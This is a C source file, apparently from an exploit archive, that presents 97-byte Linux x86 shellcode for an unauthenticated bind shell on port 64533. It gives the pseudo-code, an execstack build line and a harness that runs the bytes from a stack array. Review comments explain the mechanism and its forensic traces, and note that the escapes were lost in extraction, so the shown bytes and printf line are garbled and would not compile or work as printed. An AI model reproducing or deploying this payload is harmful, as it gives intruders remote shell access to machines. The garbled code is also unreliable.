
# Title : 97 bytes Linux x86 bind shell port 64533
# Published : 2010-07-05
# Author :


#include <stdio.h>
#include <string.h>

/*
1     ###############################################################  1
0     I'm Magnefikko member from Inj3ct0r Team & Promhyl Studies Team  1
1     ###############################################################  0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1


	by Magnefikko
	05.07.2010
	magnefikko@gmail.com
	Promhyl Studies :: http://promhyl.tk
	Subgroup: #PRekambr
	Name: 97 bytes bind sh@64533
	Platform: Linux x86
	
	sock = socket(PF_INET, SOCK_STREAM, 0);
	bind(sock, *[2, 64533, 0], 16);
	listen(sock, 5);
	nsock = accept(sock, 0, 0);
	dup2(nsock, 0);
	dup2(nsock, 1);
	execve("/bin/sh", 0, 0); // http://promhyl.tk/index.php?a=art&art=83

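	gcc -Wl,-z,execstack filename.c
	(-z execstack asks the linker to mark the stack executable; the harness
	below runs the bytes from a stack array, so on a system that enforces a
	non-executable stack the call would fault instead of running them)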

	shellcode:

x6ax66x6ax01x5bx58x99x52x6ax01x6ax02x89xe1xcdx80x89xc6x6ax66x58x43x52x66x68xfcx15x66x53x89xe1x6ax10x51x56x89xe1xcdx80x6ax66x58x43x43x6ax05x56xcdx80x6ax66x58x43x52x52x56x89xe1xcdx80x89xc3x6ax3fx58x31xc9xcdx80x6ax3fx58x41xcdx80x31xc0x50x68x2fx2fx73x68x68x2fx62x69x6ex89xe3x99x50xb0x0bx59xcdx80

*/


/*
 * Test harness: stores the byte string in a local array, prints a banner
 * with its strlen(), then casts the array to a function pointer and calls it.
 *
 * Per the pseudo-code in the header comment, the bytes open a TCP listener
 * on port 64533, accept one connection, dup2() it onto fds 0 and 1 and
 * execve("/bin/sh"). That sequence has no authentication step, so the shell
 * is handed to whichever peer connects, with this process's privileges.
 * Defender view: the visible artefacts are a listening socket on 64533 and
 * a /bin/sh process whose stdin/stdout are a socket (stderr is not
 * redirected in the pseudo-code).
 */
int main(){
	/*
	 * NOTE(review): as rendered on this page the literal holds plain text
	 * ("x6a", "x66", ...) rather than escaped bytes; the backslashes appear
	 * to have been lost in extraction, so strlen() here would not report
	 * the 97 bytes named in the title.
	 * The array is a local, so it lives on the stack; that is why the
	 * build line in the header comment passes -Wl,-z,execstack.
	 */
	char shell[] =
"x6ax66x6ax01x5bx58x99x52x6ax01x6ax02x89xe1xcdx80x89xc6x6ax66x58x43x52x66x68xfcx15x66x53x89xe1x6ax10x51x56x89xe1xcdx80x6ax66x58x43x43x6ax05x56xcdx80x6ax66x58x43x52x52x56x89xe1xcdx80x89xc3x6ax3fx58x31xc9xcdx80x6ax3fx58x41xcdx80x31xc0x50x68x2fx2fx73x68x68x2fx62x69x6ex89xe3x99x50xb0x0bx59xcdx80";
	/*
	 * NOTE(review): the string literal below is split across two source
	 * lines and its "n" characters look like stripped "\n" escapes, so this
	 * statement does not compile as shown. Separately, strlen() returns
	 * size_t while the format uses %d; %zu is the matching specifier.
	 * strlen() stops at the first zero byte, so it measures the payload
	 * only because the byte string contains no 0x00.
	 */
	printf("by Magnefikkonmagnefikko@gmail.comnpromhyl.tknnstrlen(shell)
= %dn", strlen(shell));
	/*
	 * Converts the data array to a pointer to function and calls it.
	 * ISO C does not define the object-to-function pointer conversion, and
	 * the call only works where the stack is executable (see the execstack
	 * link flag above). If the execve() in the header pseudo-code succeeds,
	 * control never comes back to main.
	 */
	(*(void (*)()) shell)();
}